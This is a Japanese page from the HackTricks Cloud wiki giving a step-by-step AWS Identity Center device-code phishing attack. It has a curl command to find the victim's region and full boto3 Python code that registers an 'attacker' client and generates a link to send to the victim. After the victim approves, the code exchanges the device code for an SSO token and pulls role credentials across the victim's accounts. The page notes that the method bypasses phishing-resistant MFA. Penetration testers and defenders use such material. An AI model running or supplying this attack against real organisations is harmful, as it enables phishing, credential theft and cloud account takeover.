Japanese - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Identity Center & SSO Unauthenticated Enum

HackTricksをサポートする

AWS Device Code Phishing

このブログ記事で最初に提案されたように、AWS SSOを使用しているユーザーにリンクを送信し、ユーザーが承認すると、攻撃者はトークンを取得してユーザーになりすましIdentity Centerでユーザーがアクセスできるすべてのロールにアクセスできるようになります。

この攻撃を実行するための要件は次のとおりです:

  • 被害者がIdentity Centerを使用していること

  • 攻撃者が被害者が使用しているサブドメイン <victimsub>.awsapps.com/start を知っていること

前述の情報だけで、攻撃者はユーザーにリンクを送信し、承認されると攻撃者はAWSユーザーアカウントにアクセスできるようになります。

攻撃

  1. サブドメインの特定

攻撃者の最初のステップは、被害者の会社がIdentity Centerで使用しているサブドメインを特定することです。これはOSINT推測 + BFを通じて行うことができます。ほとんどの会社はここで自社の名前やその変形を使用しているためです。

この情報を使って、Identity Centerが設定されたリージョンを取得することが可能です:

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1

  1. 被害者のためのリンクを生成して送信

被害者が認証できるようにAWS SSOログインリンクを生成するために、以下のコードを実行します。 デモのために、このコードをpythonコンソールで実行し、後でトークンを取得するためにいくつかのオブジェクトが必要になるので、コンソールを終了しないでください:

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

被害者にリンクを送信し、あなたの素晴らしいソーシャルエンジニアリングスキルを使ってください!

  1. 被害者がリンクを承認するのを待つ

被害者がすでにAWSにログインしている場合、権限を付与することを承認するだけで済みます。ログインしていない場合は、ログインしてから権限を付与することを承認する必要があります。 現在のプロンプトはこのようになっています:

  1. SSOアクセス・トークンを取得する

被害者がプロンプトを承認した場合、次のコードを実行してユーザーになりすましてSSOトークンを生成します:

token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

SSOアクセス トークンは8時間有効です。

  1. ユーザーを偽装する

sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])

# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])

# Get credentials over a role

sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')

フィッシング不可能なMFAをフィッシング

前述の攻撃が**「フィッシング不可能なMFA」(webAuth)が使用されている場合でも機能することを知るのは楽しいです。これは、前述のワークフローが使用されるOAuthドメインを離れないためです。他のフィッシング攻撃ではユーザーがログインドメインを偽装する必要がありますが、この場合、デバイスコードワークフローはデバイスがコードを知っているため、ユーザーは異なるマシンでもログインできます。プロンプトが承認されると、デバイスは初期コードを知っているだけでユーザーの資格情報を取得**できます。

詳細についてはこの投稿をチェックしてください。

自動ツール

参考文献

HackTricksをサポートする
PreviousAWS - IAM & STS Unauthenticated EnumNextAWS - IoT Unauthenticated Enum

Last updated